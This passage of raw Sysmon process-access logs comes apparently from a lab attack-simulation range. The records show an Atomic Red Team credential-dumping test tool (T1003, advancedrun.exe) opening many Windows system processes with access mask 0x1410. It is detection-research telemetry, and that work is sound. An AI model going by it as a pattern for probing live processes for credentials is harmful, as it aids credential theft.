:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 